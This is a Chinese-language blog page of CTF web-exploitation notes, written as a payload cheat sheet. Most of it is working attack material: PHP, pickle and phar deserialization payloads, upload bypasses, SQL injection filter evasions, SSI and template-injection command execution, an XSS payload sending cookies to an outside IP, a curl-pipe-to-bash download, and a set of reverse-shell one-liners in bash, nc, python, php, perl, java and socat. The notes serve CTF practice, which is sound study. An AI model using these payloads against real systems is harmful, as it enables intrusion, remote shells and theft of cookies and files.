<!DOCTYPE html>
<html lang="en">
<head hexo-theme='https://github.com/volantis-x/hexo-theme-volantis/tree/4.2.0'>
  <meta charset="utf-8">
  <!-- SEO相关 -->
  
    
  
  <!-- 渲染优化 -->
  <meta http-equiv='x-dns-prefetch-control' content='on' />
  <link rel='dns-prefetch' href='https://cdn.jsdelivr.net'>
  <link rel="preconnect" href="https://cdn.jsdelivr.net" crossorigin>
  <meta name="renderer" content="webkit">
  <meta name="force-rendering" content="webkit">
  <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  <meta name="HandheldFriendly" content="True" >
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <!-- 页面元数据 -->
  
  <title>ctfweb - Hexo</title>
  

  

  <!-- feed -->
  

  <!-- import meta -->
  

  <!-- link -->
  

  <!-- import link -->
  

  
    
<link rel="stylesheet" href="/css/first.css">

  

  
  <link rel="stylesheet" href="/css/style.css" media="print" onload="this.media='all';this.onload=null">
  <noscript><link rel="stylesheet" href="/css/style.css"></noscript>
  

  <script id="loadcss"></script>

</head>

<body>
  

<header id="l_header" class="l_header auto shadow blur show" style='opacity: 0' >
  <div class='container'>
  <div id='wrapper'>
    <div class='nav-sub'>
      <p class="title"></p>
      <ul class='switcher nav-list-h m-phone' id="pjax-header-nav-list">
        <li><a id="s-comment" class="fas fa-comments fa-fw" target="_self" href='javascript:void(0)'></a></li>
        
          <li><a id="s-toc" class="s-toc fas fa-list fa-fw" target="_self" href='javascript:void(0)'></a></li>
        
      </ul>
    </div>
		<div class="nav-main">
      
        
        <a class="title flat-box" target="_self" href='/'>
          
            <img no-lazy class='logo' src='https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/blog/Logo-NavBar@3x.png'/>
          
          
          
        </a>
      

			<div class='menu navigation'>
				<ul class='nav-list-h m-pc'>
          
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/
                  
                  
                  
                    id="home"
                  >
                  <i class='fas fa-rss fa-fw'></i>博客
                </a>
                
              </li>
            
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/categories/
                  
                  
                  
                    id="categories"
                  >
                  <i class='fas fa-folder-open fa-fw'></i>分类
                </a>
                
              </li>
            
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/tags/
                  
                  
                  
                    id="tags"
                  >
                  <i class='fas fa-tags fa-fw'></i>标签
                </a>
                
              </li>
            
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/archives/
                  
                  
                  
                    id="archives"
                  >
                  <i class='fas fa-archive fa-fw'></i>归档
                </a>
                
              </li>
            
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/friends/
                  
                  
                  
                    id="friends"
                  >
                  <i class='fas fa-link fa-fw'></i>友链
                </a>
                
              </li>
            
          
          
            
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/about/
                  
                  
                  
                    id="about"
                  >
                  <i class='fas fa-info-circle fa-fw'></i>关于
                </a>
                
              </li>
            
          
          
				</ul>
			</div>

      <div class="m_search">
        <form name="searchform" class="form u-search-form">
          <i class="icon fas fa-search fa-fw"></i>
          <input type="text" class="input u-search-input" placeholder="Search..." />
        </form>
      </div>

			<ul class='switcher nav-list-h m-phone'>
				
					<li><a class="s-search fas fa-search fa-fw" target="_self" href='javascript:void(0)'></a></li>
				
				<li>
          <a class="s-menu fas fa-bars fa-fw" target="_self" href='javascript:void(0)'></a>
          <ul class="menu-phone list-v navigation white-box">
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/
                  
                  
                  
                    id="home"
                  >
                  <i class='fas fa-rss fa-fw'></i>博客
                </a>
                
              </li>
            
          
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/categories/
                  
                  
                  
                    id="categories"
                  >
                  <i class='fas fa-folder-open fa-fw'></i>分类
                </a>
                
              </li>
            
          
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/tags/
                  
                  
                  
                    id="tags"
                  >
                  <i class='fas fa-tags fa-fw'></i>标签
                </a>
                
              </li>
            
          
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/archives/
                  
                  
                  
                    id="archives"
                  >
                  <i class='fas fa-archive fa-fw'></i>归档
                </a>
                
              </li>
            
          
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/friends/
                  
                  
                  
                    id="friends"
                  >
                  <i class='fas fa-link fa-fw'></i>友链
                </a>
                
              </li>
            
          
            
              
            
              <li>
                <a class="menuitem flat-box faa-parent animated-hover" href=/about/
                  
                  
                  
                    id="about"
                  >
                  <i class='fas fa-info-circle fa-fw'></i>关于
                </a>
                
              </li>
            
          
            
          </ul>
        </li>
			</ul>
		</div>
	</div>
  </div>
</header>

  <div id="l_body">
    <div id="l_cover">
  
    
        <div id="full" class='cover-wrapper post dock' style="display: none;">
          
            <div class='cover-bg lazyload placeholder' data-bg="https://cdn.jsdelivr.net/gh/volantis-x/cdn-wallpaper-minimalist/2020/033.jpg"></div>
          
          <div class='cover-body'>
  <div class='top'>
    
    
      <p class="title">Volantis</p>
    
    
  </div>
  <div class='bottom'>
    <div class='menu navigation'>
      <div class='list-h'>
        
          
            <a href="/v4/getting-started/"
              
              
              id="v4getting-started">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f5c3.svg'><p>文档</p>
            </a>
          
            <a href="/faqs/"
              
              
              id="faqs">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f516.svg'><p>帮助</p>
            </a>
          
            <a href="/examples/"
              
              
              id="examples">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f396.svg'><p>示例</p>
            </a>
          
            <a href="/contributors/"
              
              
              id="contributors">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f389.svg'><p>社区</p>
            </a>
          
            <a href="/archives/"
              
              
              id="archives">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f4f0.svg'><p>博客</p>
            </a>
          
            <a target="_blank" rel="noopener" href="https://github.com/volantis-x/hexo-theme-volantis/"
              
              
              id="https:githubcomvolantis-xhexo-theme-volantis">
              <img src='https://cdn.jsdelivr.net/gh/twitter/twemoji@13.0/assets/svg/1f9ec.svg'><p>源码</p>
            </a>
          
        
      </div>
    </div>
  </div>
</div>

          <div id="scroll-down" style="display: none;"><i class="fa fa-chevron-down scroll-down-effects"></i></div>
        </div>
    
  
  </div>

    <div id='safearea'>
      <div class='body-wrapper' id="pjax-container">
        

<div class='l_main'>
  <article class="article post white-box reveal md shadow article-type-post" id="post" itemscope itemprop="blogPost">
  


  
  <div class="article-meta" id="top">
    
    
    
      <h1 class="title">
        ctfweb
      </h1>
      <div class='new-meta-box'>
        
          
            
<div class='new-meta-item author'>
  <a class='author' href="/" rel="nofollow">
    <img no-lazy src="">
    <p>请设置文章作者</p>
  </a>
</div>

          
        
          
            

          
        
          
            <div class="new-meta-item date">
  <a class='notlink'>
    <i class="fas fa-calendar-alt fa-fw" aria-hidden="true"></i>
    <p>发布于：Mar 8, 2021</p>
  </a>
</div>

          
        
          
            
  <div class="new-meta-item browse leancloud">
    <a class='notlink'>
      
      <div id="lc-pv" data-title="ctfweb" data-path="/2021/03/08/ctfweb/">
        <i class="fas fa-eye fa-fw" aria-hidden="true"></i>
        <span id='number'><i class="fas fa-circle-notch fa-spin fa-fw" aria-hidden="true"></i></span>
        次浏览
      </div>
    </a>
  </div>


          
        
      </div>
    
  </div>


  
  CTF web小总结
一些小技巧吧，记录一下，会继续补充
PHP绕过技巧
preg_replace
绕过preg_replace('/('.$re.')/ei','strtolower("\\1")',$str);
执行phpinfo的payload：\S*=${phpinfo()}
参考： 深入研究preg_replace与代码执行
PHP伪随机数
mt_srand(seed)
mt_rand()
只要种子一样，那么生成的随机数是不会变的，所以我们可以利用php_mt_rand4.0进行爆破种子
比如：
mt_srand(12345)
mt_rand()
第一个肯定是1996335345

HTTP头相关绕过
伪造IP：
一般我们都知道可以用XXF伪造IP：X-Forwarded-For:127.0.0.1
当XXF被过滤的时候我们可以利用Client-IP: 127.0.0.1和X-Real-IP: 127.0.0.1进行绕过
绕过is_numeric
代码如下：
if (is_numeric($password)) {
	echo "password can't be number</br>";
}elseif ($password == 404) {
	echo "Password Right!</br>";
}
传入password=404%0a即可绕过7
数字长度绕过
采用科学计数法， 100000000 可以表示成10e8
绕过 (file_get_contents($text,‘r’)===“xxxx”)
利用php://input协议进行绕过
POST /?text=php://input

xxxx

data://text/plain协议也可以绕过
?text=data://text/plain;base64,xxxx的base64加密
JWT
在线解密：https://jwt.io/
爆破工具以及安装方法：
git clone "https://github.com/brendan-rius/c-jwt-cracker"
apt-get install libssl-dev
make
MD5 hash长度扩展攻击
原理：Hash Length Extension Attack
工具安装：
git clone https://github.com/bwall/HashPump
apt-get install g++ libssl-dev
cd HashPump
make
{% raw %} make install{% endraw %}

<p>使用方法：<br>比如：md5(secert_key+scan)<br>secert_key为16位、需要把read拓展进去，也就是变成md5(secert_key+scan+read)</p>
<p>hashdump<br>input Signature: md5(secert_key+scan)值<br>input Date:    scan<br>input Key Length: 16<br>Input Data to add: read    ———— 输入完毕Enter即可</p>
<p>绕过intval($num)==$num &amp;&amp; 回文<br>?num=1000000000000000.00000000000000010</p>
<p>绕过 $md5==md5(md5($md5))<br>$md5=0e1138100474 </p>
<p>绕过$md5==md5($md5)<br>$md5=0e215962016</p>
<p>PHP反序列化<br>反序列化逃逸<br>第一种关键词过滤，变少的<br>就是由于关键词过滤，导致字符变少的，比如说php置换为空，flag置换为空，这种都有可能导致字符逃逸<br>代表题目[安洵杯 2019]easy_serialize_php<br>第二种关键词过滤，变多的<br>比如说0ctf中的piapiapia，由于where–&gt;hacker导致字符数增加，根据反序列化的特性：反序列化中值的字符读取多少其实是由表示长度的数字控制的 ，;}之后的不会起作用。<br>代表题目0CTF piapiapia、i春秋2020新春公益赛 babyphp<br>session反序列化<br>主要就是由于session处理器不同所导致的问题，比如说系统默认为 php_serialize，而页面中却设置为php，那么就极有可能导致安全问题。具体原理参考文章：PHP Session 序列化及反序列化处理器设置使用不当带来的安全隐患<br>代表题目：Jarvis OJ WEB PHPINFO<br>python反序列化<br>import pickle<br>import urllib</p>
<p>class test(object):<br>    def <strong>reduce</strong>(self):<br>       return (eval, (“open(‘/flag.txt’,’r’).read()”,))</p>
<p>payload=pickle.dumps(test())<br>payload=urllib.quote(payload)</p>
<p>print payload</p>
<p>Phar反序列化<br>要将php.ini中的phar.readonly选项设置为Off，否则无法生成phar文件<br>&lt;?php<br>    class User{<br>        pop链<br>    }</p>
<pre><code>$a = new User();
$a-&gt;db = new FileList();

$phar = new Phar(&quot;1.phar&quot;);
$phar-&gt;startBuffering();
$phar-&gt;setStub(&quot;&lt;?php __HALT_COMPILER(); ?&gt;&quot;);
$phar-&gt;setMetadata($a);
$phar-&gt;addFromString(&quot;test.txt&quot;,&quot;test&quot;);
$phar-&gt;stopBuffering();</code></pre>
<p>将phar上传，通过phar://伪协议解析phar文件时，会将meta-data进行反序列化<br>注：只有以下函数通过phar://伪协议解析phar文件才会将meta-data进行反序列化<br>fileatime、filectime、file_exists、file_get_contents、file_put_contents、file、filegroup、fopen、fileinode、filemtime、fileowner、fileperms、is_dir、is_executable、is_file、is_link、is_ readable、is_writable、is_writeable、parse_ini_file、copy、unlink、stat、readfile<br>PHP上传绕过<br>短标签<br>有时在上传的过程中会出现php关键词过滤，这时候可以尝试一下短标签<?=?> <??><br>需要short_open_tag = On<br>如果asp_tags=On那么还支持&lt;%%&gt;的写法<br>绕过对&lt;?的检测<br>1、<script language="php"></script><br>2、对内容进行base64编码，解析时再解码<br>文件头检测绕过<br>一般使用GIF89a进行绕过，不过不适用于.htaccess文件上传，如果这样上传会导致.htaccess无法生效<br>.htaccess中绕过文件头检测:<br>1、在.htaccess前添加<br>#define width 1337<br>#define height 1337<br>#在.htaccess是注释符，所以.htaccess文件可以生效</p>
<p>2、在.htaccess前添加x00x00x8ax39x8ax39(要在十六进制编辑器中添加，或者使用python的bytes类型)<br>x00x00x8ax39x8ax39是wbmp文件的文件头<br>.htaccess中以0x00开头的同样也是注释符，所以不会影响.htaccess<br>后缀名绕过<br>phtml、php5、php7等<br>.user.ini<br>nginx的服务器，而且上传目录下有一个php文件，故可以上传.user.ini<br>GIF89a<br>auto_prepend_file=1.gif #php页面自动包含文件<br>.htaccess<br>apache的服务器，可以上传.htaccess<br>同时绕过对&lt;?的检测<br>AddType application/x-httpd-php .abc<br>php_value auto_append_file “php://filter/convert.base64-decode/resource=./文件名”<br>第二种：<br>类似于把文件名后缀1解析成php<br>&lt;FilesMatch “1”&gt;<br>SetHandler application/x-httpd-php<br></FilesMatch><br>shtml文件的SSI注入<br>如果支持shtml，那么可以上传一个shtml文件，里面进行ssi注入：<br>将文本内容直接插入到文档中&lt;#include&gt;<br>&lt;! #include file=”文件名称”–&gt;</p>
<!--#include virtual="index.html" -->
<p>直接执行服务器上的各种程序&lt;#exec&gt;(如CGI或其他可执行程序)</p>
<!--#exec cmd="cat /etc/passwd"-->
<p>php文件包含<br>文件包含<br>php://filter/read=convert.base64-encode/resource=文件<br>NGINX日志路径包含<br>file=../../../../../var/log/nginx/access.log<br>SQL注入<br>过滤绕过<br>单引号被过滤：<br>并不一定就能够防止sql注入<br>当sql语句为：select * from users where username=’xxxx’ and password=’xxxx’时<br>我们可以使用\进行绕过，构造username=admin,password=or 1=1#<br>这是sql语句就会变成：<br>select * from users where username=’admin&#39; and password=’or 1=1#’成功绕过<br>select被过滤：<br>这个时候可以盲猜表名进行盲注<br>如果时堆叠注入可以使用handler代替select查询：<br>1’; handler FlagHere open as hack; handler hack read first; handler hack close;<br>=被过滤：<br>可以用like进行绕过<br>and被过滤：<br>可以使用&amp;&amp;绕过<br>or被过滤：<br>可以使用||绕过<br>or被过滤意味着information不能使用，不过可以用mysql.innodb_table_stats和sys.schema_auto_increment_columns<br>in被过滤：<br>同样意味着information不能使用，不过可以使用sys.schema_table_statistics_with_buffer代替<br>空格绕过：<br>/**/<br>updatexml报错注入<br>如果过长无法显示可以使用substr、mid剪切，或者使用left、right<br>基于regexp的时间盲注<br>select * from flllllllag where id=1 and if((substr((flag),1,1) regexp “^f”), sleep(5),1)<br>无union select和字段名注数据<br>常用的无字段名注入都依赖于union select，如果不允许union和select同时出现，那可以使用如下方法<br>如果表中只有一列可以 SUBSTR((SELECT * FROM table),1,1)=’x’<br>如果由两列： 需要将查询语句与相同数量的列进行比较，再配合 &lt;= 进行盲注<br>如果说数据库中的table2中有两列，一个id，一个flag，这可以采用如下方法进行盲注<br>执行select (select ‘1’,’e<del>‘)&gt;(select * from table2 limit 1)显示0<br>执行select (select ‘1’,’f</del>‘)&gt;(select * from table2 limit 1)显示1<br>执行select (select ‘1’,’fl~’)&gt;(select * from table2 limit 1)显示1<br>不过注意一点mysql默认是不区分大小写的，所以我们可以转化成16进制再执行<br>PDO宽字节注入<br>check过滤了：<br>‘/union|select|mid|substr|and|or|sleep|benchmark|join|limit|#|-|^|&amp;|database/i’</p>
<p>if(check($id)){<br>    $query = “select balabala from table1 where 1=?”;<br>    $db-&gt;query(“set names gbk”);<br>    $row = $db-&gt;prepare($query);<br>    $row-&gt;bindParam(1,$id);<br>    $row-&gt;execute();<br>}<br>如果没有过滤那么可以使用宽字节进行注入<br>但是这里过滤了很多的东西，基本都过滤了，但是我们可以利用<br>SET @x=执行SQL语句的16进制;PREPARE a FROM @x;EXECUTE a;进行注入<br>load_file<br>有时候权限可以使用该函数时，可以直接读取文件：load_file(’/var/www/html/xxx.php’)<br>EXIF注入<br>奇葩注入，上传图片，然后在EXIF的comment中写入注入语句即可<br>CTFshow中的题目，利用工具：exiftools，payload：<br>exiftool -overwrite_original -comment=”A_dmin&quot;‘);select 0x3C3F3D60245F504F53545B305D603B into outfile ‘/var/www/html/1.php’;–+”<br>SQLite注入<br>sqlite_master是sqlite数据库中的一个隐藏表，，，，有如下字段：type/name/tbl_name/rootpage/sql<br>usr=’ union select name,sql from sqlite_master–+&amp;pw=admin<br>查询语句：<br>usr=’ union select id,id from Users–+&amp;pw=admin<br>usr=’ union select id,name from Users–+&amp;pw=admin<br>usr=’ union select id,password from Users–+&amp;pw=admin<br>usr=’ union select id,hint from Users–+&amp;pw=admin<br>对应结果：<br>name=+1;<br>name=+admin;<br>name=+3fab54a50e770d830c0416df817567662a9dc85c;<br>name=+my fav word in my fav paper?!;<br>文件名注入<br>数据库语句可能为：<br>INSERT INTO <code>xxx</code>(<code>id</code>, <code>name</code>) VALUES (‘id号’,’图片名’)<br>注入方法：<br>conv函数将16进制转化为10进制进行输出<br>‘+(conv(substr(hex(database()),1,12),16,10))+’.jpg<br>SSRF<br>格式化字符串<br>出现如下代码时，并且对参数没有过滤时：<br>print(sprintf(“$url method&amp;content_size:$method%d”, $detect));<br>可以传递$method=GET%s%，在ssrf题目中可以读取内网的文件<br>XSS<br>原生类XSS<br>代码如下：<br>$a = $_GET[‘yds_is_so_beautiful’];<br>echo unserialize($a);<br>这里有个echo，应该是包含__toString的，那我们可以使用Error和Exception类，直接用Exception，因为Error只适用于php7<br><?php
$a = serialize(new Exception("<script>window.location.href='IP'+document.cookie</script>"));
echo urlencode($a);
?><br>将结果传递就行<br>命令执行<br>各种绕过<br>空格绕过<br>$IFS、$IFS$9g、 ${IFS}<br>关键词绕过，使用变量拼接，如flag被过滤：<br>a=g;cat fla$a.php<br>cat被过滤可以使用cut，more，tail，head等命令<br>奇淫技巧<br>cat <code>ls</code> 会查看ls出来的文件<br>无参RCE<br>即只能通过无参函数来进行命令执行<br>查看当前目录：var_dump(scandir(current(localeconv())));<br>读取倒数第二个文件：readfile(next(array_reverse(scandir(current(localeconv())))));、<br>readfile(next(array_reverse(scandir(getcwd()))));<br>还有session_id(session_start())也能够利用<br>还有getallheaders：<br>请求头最后添加：<br>hacker: system(‘cat flag.php’);</p>
<p>payload=eval(end(getallheaders()));<br>Curl命令反弹shell<br>接收端创建文件shell.txt写入bash -i &gt;&amp; /dev/tcp/[ip]/[port] 0&gt;&amp;1<br>在命令执行处执行curl http://接收端IP/shell.txt|bash<br>无数字无字母RCE<br>一般采用异或、自增、取反进行绕过<br>异或脚本：<br><?php
function finds($string){
    $index = 0;
    $a=[33,35,36,37,40,41,42,43,45,47,58,59,60,62,63,64,92,93,94,123,125,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255];
    for($i=27;$i<count($a);$i++){
        for($j=27;$j<count($a);$j++){
            $x = $a[$i] ^ $a[$j];
            for($k = 0;$k<strlen($string);$k++){
                if(ord($string[$k]) == $x){
                    echo $string[$k]."\n";
                    echo '%' . dechex($a[$i]) . '^%' . dechex($a[$j])."\n";
                    $index++;
                    if($index == strlen($string)){
                        return 0;
                    }
                }
            }
        }
    }
}
finds("_GET");
?><br>自增：<br>$<em>=[];$</em>=@”$<em>“;$</em>=$<em>[‘!’==’@’];$__</em>=$<em>;$__=$</em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++; $<strong><em>.=$__;$</em></strong>.=$<strong>;$</strong>=$<em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$__</em>.=$<strong>;$</strong>=$<em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong></em>.=$<strong>;$</strong>=$<em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong></em>.=$<strong>;$__</strong>=’<em>‘;$__=$</em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$__</strong>.=$<strong>;$</strong>=$<em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>__.=$</strong>;$__=$</em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>__.=$</strong>;$<strong>=$<em>;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$</strong>++;$<strong>++;$__</strong>.=$__;$</em>=$$__</strong>;$___($<em>[</em>]);//assert($<em>POST[</em>]);<br>绕过open_basedir<br>payload:<br>chdir(‘img’);ini_set(‘open_basedir’,’..’);chdir(‘..’);chdir(‘..’);chdir(‘..’);chdir(‘..’);ini_set(‘open_basedir’,’/‘);echo(file_get_contents(‘/THis_Is_tHe_F14g’));<br>php数学函数getshell<br>?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){abs});&amp;pi=system()&amp;abs=ls /<br>一句话反弹shell<br>本机监听：<br>nc -lvvp 8080<br>python：<br>python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“174.1.175.38”,1234));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’<br>python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.37.131”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’</p>
<p>python一句话获取标准shell：<br>python -c “import pty;pty.spawn(‘/bin/bash’)”<br>php：<br>php -r ‘$sock=fsockopen(“192.168.37.131”,1234);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’<br>bash直接反弹：<br>bash -i &gt;&amp; /dev/tcp/192.168.37.131/8080 0&gt;&amp;1<br>nc反弹：<br>nc 192.168.31.174 8080 -t -e /bin/bash<br>perl脚本反弹：<br>perl -e ‘use Socket;$i=”192.168.31.41”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’<br>java脚本反弹：<br>r = Runtime.getRuntime()<br>p = r.exec([“/bin/bash”,”-c”,”exec 5&lt;&gt;/dev/tcp/192.168.31.41/8080;cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&5; done”] as String[])<br>p.waitFor()<br>msfvenom 获取反弹一句话<br>msfvenom -p cmd/unix/reverse_xxxx lhost=1.1.1.1 lport=12345 R<br>socat 反弹一句话</p>
<h1 id="第一步：下载socat到-tmp目录下"><a href="#第一步：下载socat到-tmp目录下" class="headerlink" title="第一步：下载socat到/tmp目录下"></a>第一步：下载socat到/tmp目录下</h1><p>wget -q <a target="_blank" rel="noopener" href="https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat">https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat</a> -O /tmp/socat</p>
<h1 id="第二步：给socaat授予可以执行权限"><a href="#第二步：给socaat授予可以执行权限" class="headerlink" title="第二步：给socaat授予可以执行权限"></a>第二步：给socaat授予可以执行权限</h1><p>chmod 755 /tmp/socat<br>#第三步：反弹shell到目标主机的12345端口<br>/tmp/socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:192.168.31.41：12345<br>Linux知识点<br>在 linux 系统中如果一个程序打开了一个文件没有关闭，即便从外部（上文是利用 rm -f flag.txt）删除之后，在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd，通过这个我们即可得到被删除文件的内容。<br>cat /proc/<em>/fd/</em><br>查找报告xxx内容的文件内容<br>find /etc -name “*” | xargs grep “flag{“<br>模板注入<br>smarty php模板注入<br>比如说有个回显IP的： X-Forwarded-For:{{system("cat /flag")}}<br>Twig PHP模板注入<br>提交 {{7*‘7’}} 得到49<br>payload：</p>
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
<p>jinja2 Python模板注入<br>提交 {{7*‘7’}} 得到7777777<br>payload：</p>
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()") }}
{% endif %}
{% endfor %}
<p>Tornado模板中的 handler.settings<br>获取handler.settings环境变量 {{handler.settings}}<br>信息泄露<br>PHPINFO<br>目录遍历<br>git泄露<br>.DS_Store<br>robots.txt泄露<br>备份文件泄露<br>.bak、.swp、.php~<br>.swp文件恢复使用命令：vim -r .index.php.swp恢复<br>源码泄露<br>常见的网站源码备份文件后缀<br>tar、tar.gz、zip、rar<br>常见的网站源码备份文件名<br>web、website、backup、back、www、wwwroot、temp<br>用户历史文件<br>/home/www/.bash_history<br>JAVAweb应用目录<br>/WEB-INF/web.xml：                Web应用程序的配置文件<br>/WEB-INF/classes/：                包含站点所有的class文件<br>/WEB-INF/lib/：                    存放需要的jar文件<br>/WEB-INF/src/：                    源码目录<br>/WEB-INF/database.properties：    数据库配置文件</p>

  
  
    
    <div class='footer'>
      
      
      
        <div class='copyright'>
          <blockquote>
            
              
                <p>博客内容遵循 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 协议</p>

              
            
              
                <p>本文永久链接是：<a href=http://example.com/2021/03/08/ctfweb/>http://example.com/2021/03/08/ctfweb/</a></p>
              
            
          </blockquote>
        </div>
      
      
    </div>
  
  
    


  <div class='article-meta' id="bottom">
    <div class='new-meta-box'>
      
        
          <div class="new-meta-item date" itemprop="dateUpdated" datetime="2021-03-08T10:36:31+08:00">
  <a class='notlink'>
    <i class="fas fa-edit fa-fw" aria-hidden="true"></i>
    <p>更新于：Mar 8, 2021</p>
  </a>
</div>

        
      
        
          

        
      
        
          
  <div class="new-meta-item share -mob-share-list">
  <div class="-mob-share-list share-body">
    
      
        <a class="-mob-share-qq" title="" rel="external nofollow noopener noreferrer noopener"
          
          target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=http://example.com/2021/03/08/ctfweb/&title=ctfweb - Hexo&summary="
          
          >
          
            <img src="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/qq.png" class="lazyload" data-srcset="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/qq.png" srcset="data:image/png;base64,666">
          
        </a>
      
    
      
        <a class="-mob-share-qzone" title="" rel="external nofollow noopener noreferrer noopener"
          
          target="_blank" href="https://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=http://example.com/2021/03/08/ctfweb/&title=ctfweb - Hexo&summary="
          
          >
          
            <img src="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/qzone.png" class="lazyload" data-srcset="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/qzone.png" srcset="data:image/png;base64,666">
          
        </a>
      
    
      
        <a class="-mob-share-weibo" title="" rel="external nofollow noopener noreferrer noopener"
          
          target="_blank" href="http://service.weibo.com/share/share.php?url=http://example.com/2021/03/08/ctfweb/&title=ctfweb - Hexo&summary="
          
          >
          
            <img src="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/weibo.png" class="lazyload" data-srcset="https://cdn.jsdelivr.net/gh/volantis-x/cdn-org/logo/128/weibo.png" srcset="data:image/png;base64,666">
          
        </a>
      
    
      
    
      
    
  </div>
</div>



        
      
    </div>
  </div>


  
  

  
    <div class="prev-next">
      
      
        <a class='next' href='/2021/03/04/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E6%96%B0%E6%89%8B%E5%8C%BA%E9%A2%98%E8%A7%A3/'>
          <p class='title'>攻防世界新手区题解<i class="fas fa-chevron-right" aria-hidden="true"></i></p>
          <p class='content'>1.view_source：X老师让小宁同学查看一个网页的源代码，但小宁同学发现鼠标右键好像不管用了。 本题打开网页查看源代码即得到flag 2.robots：X老师上课讲了Robots协议，小...</p>
        </a>
      
    </div>
  
</article>


  

  <article class="post white-box reveal shadow" id="comments">
    <p ct><i class='fas fa-comments'></i> 评论</p>
    
    <div id="valine_container" class="valine_thread">
